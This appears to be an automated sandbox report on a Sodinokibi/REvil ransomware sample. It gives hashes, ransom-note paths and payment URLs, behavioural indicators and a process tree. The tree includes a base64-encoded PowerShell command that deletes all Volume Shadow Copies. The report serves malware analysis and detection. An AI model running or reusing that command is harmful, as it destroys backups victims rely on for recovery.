Analysis
-
max time kernel
124s -
max time network
56s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
07-05-2020 21:49
Static task
static1
Behavioral task
behavioral1
Sample
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
Resource
win10v200430
General
-
Target
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
-
Size
975KB
-
MD5
cce629db2606ae98ba6e931adbf1aeae
-
SHA1
2649ce761c00f4505758e20580e8bdf3e8d559d1
-
SHA256
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d
-
SHA512
7f64fab63ce7117d131d28f9657cbd4b096e7b8ac959cacf4f876709678c26f37bdf8b4575d8c8aa8e4920c203cd938bd9d39b8425212301d57c4ed5ab906c96
Malware Config
Extracted
C:\4d7h7y-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/78174560FC96B22E
http://decryptor.cc/78174560FC96B22E
Signatures
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exepid process 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeBackupPrivilege 1164 vssvc.exe Token: SeRestorePrivilege 1164 vssvc.exe Token: SeAuditPrivilege 1164 vssvc.exe Token: SeTakeOwnershipPrivilege 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\zl44fj2hc26f.bmp" 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious behavior: EnumeratesProcesses 75 IoCs
Processes:
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exepowershell.exepid process 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1604 powershell.exe 1604 powershell.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exedescription pid process target process PID 1020 wrote to memory of 1604 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe powershell.exe PID 1020 wrote to memory of 1604 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe powershell.exe PID 1020 wrote to memory of 1604 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe powershell.exe PID 1020 wrote to memory of 1604 1020 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe powershell.exe -
Drops file in Program Files directory 24 IoCs
Processes:
774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exedescription ioc process File opened for modification \??\c:\program files\SetConfirm.mpeg3 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File created \??\c:\program files\4d7h7y-readme.txt 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\ApproveResolve.dotx 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\AssertConvert.TS 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\AssertInvoke.vdx 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\DismountClose.3gp2 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\EnableSelect.jpe 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File created \??\c:\program files\microsoft sql server compact edition\4d7h7y-readme.txt 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\SplitRemove.avi 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\SubmitBackup.dib 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\SubmitSuspend.gif 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\UnprotectAssert.eps 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\MoveSubmit.mpeg3 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\PopPublish.WTV 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\ResetRestart.tiff 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\SubmitJoin.docx 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\UnblockRevoke.xltm 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\UndoSuspend.ini 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\4d7h7y-readme.txt 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File created \??\c:\program files (x86)\4d7h7y-readme.txt 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\ConvertToPing.wav 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\ImportResize.3gpp 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File opened for modification \??\c:\program files\OutNew.mht 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4d7h7y-readme.txt 774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe"C:\Users\Admin\AppData\Local\Temp\774354fe16764fa513052ff714048858cb315691599a08d13ba56be1c796a16d.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of AdjustPrivilegeToken
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
PID:1020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1604
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:524
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1164